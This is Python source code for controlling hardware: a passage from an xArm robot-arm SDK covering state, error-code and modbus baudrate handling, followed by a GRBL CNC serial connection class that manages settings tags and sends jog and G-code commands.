if not self._check_cmdnum_limit or self._stream_type != 'socket' or not self._enable_report:
return
# if time.time() - self._last_report_time > 0.4:
# self.get_cmdnum()
if self._max_cmd_num / 2 < self.cmd_num < self._max_cmd_num:
self.get_cmdnum()
while self.cmd_num >= self._max_cmd_num:
if not self.connected:
return APIState.NOT_CONNECTED
elif self.has_error:
return APIState.HAS_ERROR
elif not self.state_is_ready:
return APIState.NOT_READY
elif self.is_stop:
return APIState.EMERGENCY_STOP
time.sleep(0.05)
@xarm_is_connected(_type='get')
def get_version(self):
ret = self.arm_cmd.get_version()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
version = ''.join(list(map(chr, ret[1:])))
self._version = version[:version.find('\0')]
return ret[0], self._version
@xarm_is_connected(_type='get')
def get_robot_sn(self):
ret = self.arm_cmd.get_robot_sn()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
robot_sn = ''.join(list(map(chr, ret[1:])))
split_inx = robot_sn.find('\0')
self._robot_sn = robot_sn[:split_inx]
control_box_sn = robot_sn[split_inx+1:]
self._control_box_sn = control_box_sn[:control_box_sn.find('\0')].strip()
self._arm_type_is_1300 = int(self._robot_sn[2:6]) >= 1300 if self._robot_sn[2:6].isdigit() else False
self._control_box_type_is_1300 = int(self._control_box_sn[2:6]) >= 1300 if self._control_box_sn[2:6].isdigit() else False
return ret[0], self._robot_sn
@xarm_is_connected(_type='get')
def check_verification(self):
ret = self.arm_cmd.check_verification()
ret[0] = self._check_code(ret[0])
return ret[0], ret[1]
@xarm_is_connected(_type='get')
def get_position(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_tcp_pose()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
self._position = [filter_invaild_number(ret[i], 6, default=self._position[i-1]) for i in range(1, 7)]
return ret[0], [float(
'{:.6f}'.format(math.degrees(self._position[i]) if 2 < i < 6 and not is_radian else self._position[i])) for
i in range(len(self._position))]
@xarm_is_connected(_type='get')
def get_servo_angle(self, servo_id=None, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_joint_pos()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 7:
self._angles = [filter_invaild_number(ret[i], 6, default=self._angles[i-1]) for i in range(1, 8)]
if servo_id is None or servo_id == 8 or len(self._angles) < servo_id:
return ret[0], list(
map(lambda x: float('{:.6f}'.format(x if is_radian else math.degrees(x))), self._angles))
else:
return ret[0], float(
'{:.6f}'.format(self._angles[servo_id - 1] if is_radian else math.degrees(self._angles[servo_id - 1])))
@xarm_is_connected(_type='get')
def get_position_aa(self, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
ret = self.arm_cmd.get_position_aa()
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
self._pose_aa = [filter_invaild_number(ret[i], 6, default=self._pose_aa[i - 1]) for i in range(1, 7)]
return ret[0], [float(
'{:.6f}'.format(math.degrees(self._pose_aa[i]) if 2 < i < 6 and not is_radian else self._pose_aa[i]))
for i in range(len(self._pose_aa))]
@xarm_is_connected(_type='get')
def get_pose_offset(self, pose1, pose2, orient_type_in=0, orient_type_out=0, is_radian=None):
is_radian = self._default_is_radian if is_radian is None else is_radian
_pose1 = [pose1[i] if i <= 2 or is_radian else math.radians(pose1[i]) for i in range(6)]
_pose2 = [pose2[i] if i <= 2 or is_radian else math.radians(pose2[i]) for i in range(6)]
ret = self.arm_cmd.get_pose_offset(_pose1, _pose2, orient_type_in, orient_type_out)
ret[0] = self._check_code(ret[0])
if ret[0] == 0 and len(ret) > 6:
pose = [float('{:.6f}'.format(ret[i] if i <= 3 or is_radian else math.degrees(ret[i]))) for i in
range(1, 7)]
return ret[0], pose
return ret[0], ret[1:7]
def get_is_moving(self):
self.get_state()
return self._state == 1
@xarm_is_connected(_type='get')
def get_state(self):
ret = self.arm_cmd.get_state()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
# if ret[1] != self._state:
# self._state = ret[1]
# self._report_state_changed_callback()
self._state = ret[1]
self._last_update_state_time = time.time()
return ret[0], ret[1] if ret[0] == 0 else self._state
@xarm_is_connected(_type='set')
def set_state(self, state=0):
_state = self._state
ret = self.arm_cmd.set_state(state)
ret[0] = self._check_code(ret[0])
if state == 4 and ret[0] == 0:
# self._last_position[:6] = self.position
# self._last_angles = self.angles
self._sleep_finish_time = 0
# self._is_sync = False
self.get_state()
if _state != self._state:
self._report_state_changed_callback()
if self.state != 3 and (_state == 3 or self._pause_cnts > 0):
with self._pause_cond:
self._pause_cond.notifyAll()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[set_state], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[set_state], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> set_state({}) -> code={}, state={}'.format(state, ret[0], self._state), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def set_mode(self, mode=0):
ret = self.arm_cmd.set_mode(mode)
ret[0] = self._check_code(ret[0])
self.log_api_info('API -> set_mode({}) -> code={}'.format(mode, ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='get')
def get_cmdnum(self):
ret = self.arm_cmd.get_cmdnum()
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
if ret[1] != self._cmd_num:
self._report_cmdnum_changed_callback()
self._cmd_num = ret[1]
self._last_update_cmdnum_time = time.time()
return ret[0], self._cmd_num
@xarm_is_connected(_type='get')
def get_err_warn_code(self, show=False, lang='en'):
ret = self.arm_cmd.get_err_code()
lang = lang if lang == 'cn' else 'en'
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
# if ret[1] != self._error_code or ret[2] != self._warn_code:
# self._error_code, self._warn_code = ret[1:3]
# self._report_error_warn_changed_callback()
self._error_code, self._warn_code = ret[1:3]
self._last_update_err_time = time.time()
if show:
pretty_print('************* {}, {}: {} **************'.format(
'获取控制器错误警告码' if lang == 'cn' else 'GetErrorWarnCode',
'状态' if lang == 'cn' else 'Status',
ret[0]), color='light_blue')
controller_error = ControllerError(self._error_code, status=0)
controller_warn = ControllerWarn(self._warn_code, status=0)
pretty_print('* {}: {}, {}: {}'.format(
'错误码' if lang == 'cn' else 'ErrorCode',
controller_error.code,
'信息' if lang == 'cn' else 'Info',
controller_error.title[lang]),
color='red' if self._error_code != 0 else 'white')
pretty_print('* {}: {}, {}: {}'.format(
'警告码' if lang == 'cn' else 'WarnCode',
controller_warn.code,
'信息' if lang == 'cn' else 'Info',
controller_warn.title[lang]),
color='yellow' if self._warn_code != 0 else 'white')
pretty_print('*' * 50, color='light_blue')
return ret[0], ret[1:3] if ret[0] == 0 else [self._error_code, self._warn_code]
@xarm_is_connected(_type='set')
def clean_error(self):
ret = self.arm_cmd.clean_err()
self.get_state()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[clean_error], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[clean_error], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> clean_error -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def clean_warn(self):
ret = self.arm_cmd.clean_war()
self.log_api_info('API -> clean_warn -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
@xarm_is_not_simulation_mode(ret=0)
def motion_enable(self, enable=True, servo_id=None):
assert servo_id is None or (isinstance(servo_id, int) and 1 <= servo_id <= 8)
if servo_id is None or servo_id == 8:
ret = self.arm_cmd.motion_en(8, int(enable))
else:
ret = self.arm_cmd.motion_en(servo_id, int(enable))
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
self._is_ready = bool(enable)
self.get_state()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[motion_enable], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[motion_enable], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> motion_enable -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
def wait_move(self, timeout=None):
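        # Block until the current motion finishes, an error or emergency stop
        # is reported, or the optional timeout expires; velocity modes (4/5)
        # return immediately since they have no notion of "motion finished".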
if timeout is not None:
            expired = time.time() + timeout + (self._sleep_finish_time - time.time() if self._sleep_finish_time > time.time() else 0)
else:
expired = 0
count = 0
_, state = self.get_state()
max_cnt = 4 if _ == 0 and state == 1 else 10
while timeout is None or time.time() < expired:
if not self.connected:
self.log_api_info('wait_move, xarm is disconnect', code=APIState.NOT_CONNECTED)
return APIState.NOT_CONNECTED
if time.time() - self._last_report_time > 0.4:
self.get_state()
self.get_err_warn_code()
if self.error_code != 0:
self.log_api_info('wait_move, xarm has error, error={}'.format(self.error_code), code=APIState.HAS_ERROR)
return APIState.HAS_ERROR
# no wait in velocity mode
if self.mode in [4, 5]:
return 0
if self.is_stop:
_, state = self.get_state()
if _ != 0 or state not in [4, 5]:
time.sleep(0.02)
continue
self._sleep_finish_time = 0
self.log_api_info('wait_move, xarm is stop, state={}'.format(self.state), code=APIState.EMERGENCY_STOP)
return APIState.EMERGENCY_STOP
if time.time() < self._sleep_finish_time or self.state == 3:
time.sleep(0.02)
count = 0
continue
if self.state != 1:
count += 1
if count >= max_cnt:
_, state = self.get_state()
self.get_err_warn_code()
if _ == 0 and state != 1:
return 0
else:
count = 0
# return 0
# if count % 4 == 0:
# self.get_state()
# self.get_err_warn_code()
else:
count = 0
time.sleep(0.05)
return APIState.WAIT_FINISH_TIMEOUT
@xarm_is_connected(_type='set')
def _check_modbus_code(self, ret, length=2, only_check_code=False, host_id=XCONF.TGPIO_HOST_ID):
code = ret[0]
if self._check_code(code) == 0:
if not only_check_code:
if len(ret) < length:
return APIState.MODBUS_ERR_LENG
if ret[1] != host_id:
return APIState.HOST_ID_ERR
if code != 0:
if host_id == XCONF.TGPIO_HOST_ID:
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code != 19 and self.error_code != 28:
code = 0
else:
if self.error_code != 100 + host_id:
self.get_err_warn_code()
if self.error_code != 100 + host_id:
code = 0
return code
@xarm_is_connected(_type='set')
def checkset_modbus_baud(self, baudrate, check=True, host_id=XCONF.TGPIO_HOST_ID):
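        # Verify (and if necessary rewrite) the modbus baudrate of the tool
        # GPIO or linear-track host, temporarily suppressing the error/state
        # churn caused by the soft-reboot register write.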
if check and ((host_id == XCONF.TGPIO_HOST_ID and self.modbus_baud == baudrate) or (host_id == XCONF.LINEER_TRACK_HOST_ID and self.linear_track_baud == baudrate)):
return 0
if baudrate not in self.arm_cmd.BAUDRATES:
return APIState.MODBUS_BAUD_NOT_SUPPORT
ret, cur_baud_inx = self._get_modbus_baudrate_inx(host_id=host_id)
if ret == 0:
baud_inx = self.arm_cmd.BAUDRATES.index(baudrate)
if cur_baud_inx != baud_inx:
try:
self._ignore_error = True
                    self._ignore_state = self.state not in [4, 5]
state = self.state
# self.arm_cmd.tgpio_addr_w16(XCONF.ServoConf.MODBUS_BAUDRATE, baud_inx)
self.arm_cmd.tgpio_addr_w16(0x1A0B, baud_inx, bid=host_id)
time.sleep(0.3)
self.arm_cmd.tgpio_addr_w16(XCONF.ServoConf.SOFT_REBOOT, 1, bid=host_id)
if host_id == XCONF.TGPIO_HOST_ID:
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code == 19 or self.error_code == 28:
self.clean_error()
if self._ignore_state:
self.set_state(state if state >= 3 else 0)
time.sleep(1)
else:
if self.error_code != 100 + host_id:
self.get_err_warn_code()
if self.error_code == 100 + host_id:
self.clean_error()
if self._ignore_state:
self.set_state(state if state >= 3 else 0)
time.sleep(1)
except Exception as e:
self._ignore_error = False
self._ignore_state = False
logger.error('checkset_modbus_baud error: {}'.format(e))
return APIState.API_EXCEPTION
self._ignore_error = False
self._ignore_state = False
ret, cur_baud_inx = self._get_modbus_baudrate_inx(host_id=host_id)
self.log_api_info('API -> checkset_modbus_baud -> code={}, baud_inx={}'.format(ret, cur_baud_inx), code=ret)
# if ret == 0 and cur_baud_inx < len(self.arm_cmd.BAUDRATES):
# self.modbus_baud = self.arm_cmd.BAUDRATES[cur_baud_inx]
if host_id == XCONF.TGPIO_HOST_ID:
return 0 if self.modbus_baud == baudrate else APIState.MODBUS_BAUD_NOT_CORRECT
elif host_id == XCONF.LINEER_TRACK_HOST_ID:
return 0 if self.linear_track_baud == baudrate else APIState.MODBUS_BAUD_NOT_CORRECT
else:
if ret == 0 and 0 <= cur_baud_inx < len(self.arm_cmd.BAUDRATES):
return 0 if self.arm_cmd.BAUDRATES[cur_baud_inx] == baudrate else APIState.MODBUS_BAUD_NOT_CORRECT
return APIState.MODBUS_BAUD_NOT_CORRECT
@xarm_is_connected(_type='get')
def _get_modbus_baudrate_inx(self, host_id=XCONF.TGPIO_HOST_ID):
ret = self.arm_cmd.tgpio_addr_r16(XCONF.ServoConf.MODBUS_BAUDRATE & 0x0FFF, bid=host_id)
if ret[0] in [XCONF.UxbusState.ERR_CODE, XCONF.UxbusState.WAR_CODE]:
if host_id == XCONF.TGPIO_HOST_ID:
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code != 19 and self.error_code != 28:
ret[0] = 0
else:
if self.error_code != 100 + host_id:
self.get_err_warn_code()
if self.error_code != 100 + host_id:
ret[0] = 0
if ret[0] == 0 and 0 <= ret[1] < len(self.arm_cmd.BAUDRATES):
if host_id == XCONF.TGPIO_HOST_ID:
self.modbus_baud = self.arm_cmd.BAUDRATES[ret[1]]
elif host_id == XCONF.LINEER_TRACK_HOST_ID:
self.linear_track_baud = self.arm_cmd.BAUDRATES[ret[1]]
return ret[0], ret[1]
@xarm_is_connected(_type='set')
def set_tgpio_modbus_timeout(self, timeout):
ret = self.arm_cmd.set_modbus_timeout(timeout)
self.log_api_info('API -> set_tgpio_modbus_timeout -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def set_tgpio_modbus_baudrate(self, baud):
code = self.checkset_modbus_baud(baud, check=False)
self.log_api_info('API -> set_tgpio_modbus_baudrate -> code={}'.format(code), code=code)
return code
@xarm_is_connected(_type='get')
def get_tgpio_modbus_baudrate(self):
code, baud_inx = self._get_modbus_baudrate_inx()
# if code == 0 and baud_inx < len(self.arm_cmd.BAUDRATES):
# self.modbus_baud = self.arm_cmd.BAUDRATES[baud_inx]
return code, self.modbus_baud
def getset_tgpio_modbus_data(self, datas, min_res_len=0, ignore_log=False):
if not self.connected:
return APIState.NOT_CONNECTED, []
ret = self.arm_cmd.tgpio_set_modbus(datas, len(datas))
ret[0] = self._check_modbus_code(ret, min_res_len + 2)
if not ignore_log:
self.log_api_info('API -> getset_tgpio_modbus_data -> code={}, response={}'.format(ret[0], ret[2:]), code=ret[0])
return ret[0], ret[2:]
@xarm_is_connected(_type='set')
def set_simulation_robot(self, on_off):
ret = self.arm_cmd.set_simulation_robot(on_off)
ret[0] = self._check_code(ret[0])
self.log_api_info('API -> set_simulation_robot({}) -> code={}'.format(on_off, ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
@xarm_is_pause(_type='set')
@xarm_wait_until_cmdnum_lt_max(only_wait=False)
def set_tcp_load(self, weight, center_of_gravity):
if compare_version(self.version_number, (0, 2, 0)):
_center_of_gravity = center_of_gravity
else:
_center_of_gravity = [item / 1000.0 for item in center_of_gravity]
ret = self.arm_cmd.set_tcp_load(weight, _center_of_gravity)
self.log_api_info('API -> set_tcp_load -> code={}, weight={}, center={}'.format(ret[0], weight, _center_of_gravity), code=ret[0])
return ret[0]
|
grbl.py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Jason Engman <jengman@testtech-solutions.com>
# Copyright (c) 2021 Adam Solchenberger <asolchenberger@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import re
import threading
import serial
import time
import struct
from typing import Any, Callable, Optional
from backend.managers.connection_classes.base import Connection
from backend.managers.connection_classes.const import DATATYPES
from gi.repository import Gtk, GObject, Gdk, GdkPixbuf
CNC_BUFFER_SZ = 128
class Grbl_Connection(Connection):
def __init__(self, manager: object, idx: str):
super(Grbl_Connection, self).__init__(manager, idx)
params = self.db_manager.get_rows("GrblConnectionsParams",["Port", "PendantPort", "Pollrate", "AutoConnect"], match_col="ID", match=self.id)
if not len(params):
raise KeyError("Grbl connection parameters missing in project database for ID: {}".format(self.id))
params = params[0]
self.port = params["Port"]
self.pollrate = float(params["Pollrate"])
self.auto_connect = (params["AutoConnect"])
self.settings_read_req = True # read all settings on connect
self.connection_err = False
self.connect_cmd = False
self.connection_handle = None
self.poll_thread = threading.Thread(target=self.poll, args=(self,))
#self.poll_thread.daemon=True
self.WCO = [0,0,0]
self.state_enum = {'Disconnected':0,
'Idle': 1,
'Run':2,
'Hold:0': 3,
'Hold:1': 3.1,
'Jog':4,
'Alarm':5,
'Door:0':6,
'Door:1':6.1,
'Door:2':6.2,
'Door:3':6.3,
'Check':7,
'Home':8,
'Sleep':9}
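        # Tag table: '$n' keys mirror GRBL settings, the remaining keys are
        # internal status/command tags maintained by poll() and write().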
self.tags = {
'$0': {"Value": 10, "Timestamp": 0.0, "DataType": "INT"},
'$1': {"Value": 25, "Timestamp": 0.0, "DataType": "INT"},
'$2': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$3': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$4': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$5': {"Value": 1, "Timestamp": 0.0, "DataType": "INT"},
'$6': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$10': {"Value": 1, "Timestamp": 0.0, "DataType": "INT"},
'$11': {"Value": 0.010, "Timestamp": 0.0, "DataType": "REAL"},
'$12': {"Value": 0.002, "Timestamp": 0.0, "DataType": "REAL"},
'$13': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$20': {"Value": 0, "Timestamp": 0.0, "DataType": "INT"},
'$21': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'$22': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'$23': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'$24': {"Value":25.000, "Timestamp": 0.0, "DataType": "REAL"},
'$25': {"Value":500.000, "Timestamp": 0.0, "DataType": "REAL"},
'$26': {"Value":250, "Timestamp": 0.0, "DataType": "INT"},
'$27': {"Value":1.000, "Timestamp": 0.0, "DataType": "REAL"},
'$30': {"Value":1000, "Timestamp": 0.0, "DataType": "INT"},
'$31': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'$32': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'$100': {"Value":100.000, "Timestamp": 0.0, "DataType": "REAL"},
'$101': {"Value":100.000, "Timestamp": 0.0, "DataType": "REAL"},
'$102': {"Value":100.000, "Timestamp": 0.0, "DataType": "REAL"},
'$110': {"Value":5000.000, "Timestamp": 0.0, "DataType": "REAL"},
'$111': {"Value":5000.000, "Timestamp": 0.0, "DataType": "REAL"},
'$112': {"Value":1000.000, "Timestamp": 0.0, "DataType": "REAL"},
'$120': {"Value":10.000, "Timestamp": 0.0, "DataType": "REAL"},
'$121': {"Value":10.000, "Timestamp": 0.0, "DataType": "REAL"},
'$122': {"Value":10.000, "Timestamp": 0.0, "DataType": "REAL"},
'$130': {"Value":200.000, "Timestamp": 0.0, "DataType": "REAL"},
'$131': {"Value":200.000, "Timestamp": 0.0, "DataType": "REAL"},
'$132': {"Value":200.000, "Timestamp": 0.0, "DataType": "REAL"},
'state': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'pendant-ticks': {"Value":0, "Timestamp": 0.0, "DataType": "UDINT"},
'manual-ticks-init': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'manual-sp-init': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'pendant-mm-rev': {"Value":10.0, "Timestamp": 0.0, "DataType": "REAL"},
'MPos-X': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'MPos-Y': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'MPos-Z': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WPos-X': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WPos-Y': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WPos-Z': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WCO-X': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WCO-Y': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'WCO-Z': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'manual-X': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'manual-Y': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'manual-Z': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'manual-X-sp': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'manual-Y-sp': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'manual-Z-sp': {"Value":0.0, "Timestamp": 0.0, "DataType": "REAL"},
'jogspeed-X': {"Value":500, "Timestamp": 0.0, "DataType": "REAL"},
'jogdist-X': {"Value":1.0, "Timestamp": 0.0, "DataType": "REAL"},
'jogspeed-Y': {"Value":500, "Timestamp": 0.0, "DataType": "REAL"},
'jogdist-Y': {"Value":1.0, "Timestamp": 0.0, "DataType": "REAL"},
'jogspeed-Z': {"Value":100, "Timestamp": 0.0, "DataType": "REAL"},
'jogdist-Z': {"Value":0.2, "Timestamp": 0.0, "DataType": "REAL"},
'eu': {"Value":0, "Timestamp": 0.0, "DataType": "INT"}, # 0=mm 1=inches
'spindle-run': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'coolant': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'override-spindle': {"Value":100.0, "Timestamp": 0.0, "DataType": "REAL"},
'override-feed': {"Value":100.0, "Timestamp": 0.0, "DataType": "REAL"},
'override-rapids': {"Value":100.0, "Timestamp": 0.0, "DataType": "REAL"},
'pin-X': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-Y': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-Z': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-P': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-D': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-H': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-R': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'pin-S': {"Value":False, "Timestamp": 0.0, "DataType": "BOOL"},
'block-in-avail': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'chars-avail': {"Value":0, "Timestamp": 0.0, "DataType": "INT"},
'spindle-speed': {"Value":0, "Timestamp": 0.0, "DataType": "REAL"},
'feedrate': {"Value":0, "Timestamp": 0.0, "DataType": "REAL"},
}
self.pendant = Pendant(self, params["PendantPort"], self.connection_manager)
self.realtime_cmd = None
self.blocks_to_send_private = [] #gcode blocks or lines to send (not threadsafe)
self.blocks_to_send = [] #gcode blocks or lines to send
self.block_lock = False
self.blocks_sent = [] #blocks that have been sent but not completed
if self.auto_connect:
self.connectDevice()
def read(self, tags):
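        # Return a timestamped snapshot of the requested tags; while the
        # controller is disconnected only 'state' is reported.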
results = {}
ts = time.time()
for tag in tags:
try:
if tag != 'state' and not self.tags['state']['Value']: #is disconnected, return None
raise KeyError
results[tag] = self.tags[tag]
results[tag]['Timestamp'] = ts
except KeyError:
pass
return results
def write(self, tag, val):
#catch all for controller writes
if tag.startswith("$"):
self.realtime_cmd = "{}={}".format(tag,val) #settings tags
self.settings_read_req = True
return
if tag in self.tags:
self.tags[tag]["Value"] = DATATYPES[self.tags[tag]["DataType"]]["Py_type"](val) #cast val to that type
return
if tag == 'resume_cmd':
self.realtime_cmd = "~\n"
return
if tag == 'hold_cmd':
self.realtime_cmd = "!\n"
return
if tag == 'reset_cmd':
self.realtime_cmd = "\x18\n"
            self.blocks_to_send = []
            self.blocks_to_send_private = []
return
if tag == 'alm_reset_cmd':
self.realtime_cmd = "$X\n"
return
if tag == 'home_cmd':
self.realtime_cmd = "$H\n"
return
if tag == 'jog-X-pos':
self.realtime_cmd = "$J=G91X{}F{}\n".format(self.tags["jogdist-X"]['Value'], self.tags["jogspeed-X"]['Value'])
return
if tag == 'jog-X-neg':
self.realtime_cmd = "$J=G91X-{}F{}\n".format(self.tags["jogdist-X"]['Value'], self.tags["jogspeed-X"]['Value'])
return
if tag == 'jog-Y-pos':
self.realtime_cmd = "$J=G91Y{}F{}\n".format(self.tags["jogdist-Y"]['Value'], self.tags["jogspeed-Y"]['Value'])
return
if tag == 'jog-Y-neg':
self.realtime_cmd = "$J=G91Y-{}F{}\n".format(self.tags["jogdist-Y"]['Value'], self.tags["jogspeed-Y"]['Value'])
return
if tag == 'jog-Z-pos':
self.realtime_cmd = "$J=G91Z{}F{}".format(self.tags["jogdist-Z"]['Value'], self.tags["jogspeed-Z"]['Value'])
return
if tag == 'jog-Z-neg':
self.realtime_cmd = "$J=G91Z-{}F{}\n".format(self.tags["jogdist-Z"]['Value'], self.tags["jogspeed-Z"]['Value'])
return
if tag == 'home-X':
self.blocks_to_send.append("G10P0L20X{}".format(val))
return
if tag == 'home-Y':
self.blocks_to_send.append("G10P0L20Y{}".format(val))
return
if tag == 'home-Z':
self.blocks_to_send.append("G10P0L20Z{}".format(val))
return
if tag == 'gcode-line':
if val.startswith("$"):
self.realtime_cmd = "{}\n".format(val)
else:
self.blocks_to_send.append(val)
return
if tag == 'gcode-program':
self.send_gcode(val)
return
if tag.startswith('override-'):
cmds = {"feed-100" : b"\x90",
"feed-inc-10" : b"\x91",
"feed-dec-10" : b"\x92",
"feed-inc-1" : b"\x93",
"feed-dec-1" : b"\x94",
"rapids-100" : b"\x95",
"rapids-50" : b"\x96",
"rapids-25" : b"\x97",
"spindle-100" : b"\x99",
"spindle-inc-10" : b"\x9A",
"spindle-dec-10" : b"\x9B",
"spindle-inc-1" : b"\x9C",
"spindle-dec-1" : b"\x9D",
}
_cmd = cmds.get(tag.replace('override-', ''))
if _cmd:
                self.realtime_cmd = _cmd
return
if tag in ['manual-cmd-X', 'manual-cmd-Y', 'manual-cmd-Z']:
self.manual_toggle(tag)
return
#if write command isn't identified that throw alarm
event_msg = "Unhandled connection write in CNC: {}".format(tag)
self.connection_manager.emit("new_event", event_msg)
def send_gcode(self, gcode):
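        # Queue a whole G-code program line by line; block_lock is a simple
        # busy-wait flag guarding blocks_to_send against the poll thread.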
while(self.block_lock):
pass
self.block_lock = True
for line in gcode.split('\n'):
line = line.strip('\r')
self.blocks_to_send.append(line)
self.block_lock = False
def manual_toggle(self, cmd):
#print(self.tags['manual-X'])
if self.tags['state']["Value"] != 1:
return
axis = cmd.replace('manual-cmd-',"")
state = self.tags['manual-{}'.format(axis)]["Value"]
for a in ["X","Y","Z"]:
self.tags['manual-{}'.format(a)]["Value"] = False
if not state: #was off, turn on
self.tags['manual-{}'.format(axis)]["Value"] = True
self.tags['manual-ticks-init']["Value"] = self.tags['pendant-ticks']["Value"]
self.tags['manual-sp-init']["Value"] = self.tags['WPos-{}'.format(axis)]["Value"]
#print(self.tags['manual-X'],type(self.tags['manual-X']['Value']))
self.update_manual_vals()
def update_manual_vals(self):
for axis in ["X","Y","Z"]:
if self.tags['manual-{}'.format(axis)]["Value"]:
sp = self.tags['manual-sp-init']["Value"] - (self.tags['manual-ticks-init']["Value"]-self.tags['pendant-ticks']["Value"]) / (self.tags['pendant-mm-rev']["Value"])
speed = self.tags['jogspeed-{}'.format(axis)]["Value"]
self.realtime_cmd = '$J=G90{}{}F{}\n'.format(axis, sp, speed)
self.tags['manual-{}-sp'.format(axis)]["Value"] = sp
else:
self.tags['manual-{}-sp'.format(axis)]["Value"] = self.tags['WPos-{}'.format(axis)]["Value"]
def connectDevice(self,*args):
self.connect_cmd = True
if not self.poll_thread.is_alive():
self.poll_thread = threading.Thread(target=self.poll, args=(self,))
self.poll_thread.daemon=True
self.poll_thread.start()
def disconnectDevice(self,*args):
self.connect_cmd = False
while self.poll_thread.is_alive():
time.sleep(0.01)
if self.connection_handle:
self.connection_handle.close()
self.connection_handle = None
self.tags['state']["Value"] = 0
def update_conn_settings(self,db,setting,val,*args):
if setting == 'PORT':
self.port = val
self.db_manager.set_db_val_by_id(db,setting,self.id,val) #update memory db
self.db_manager.copy_table(db) #update main db
def poll(self, *args):
self.connection_handle = None
tx_id = 0
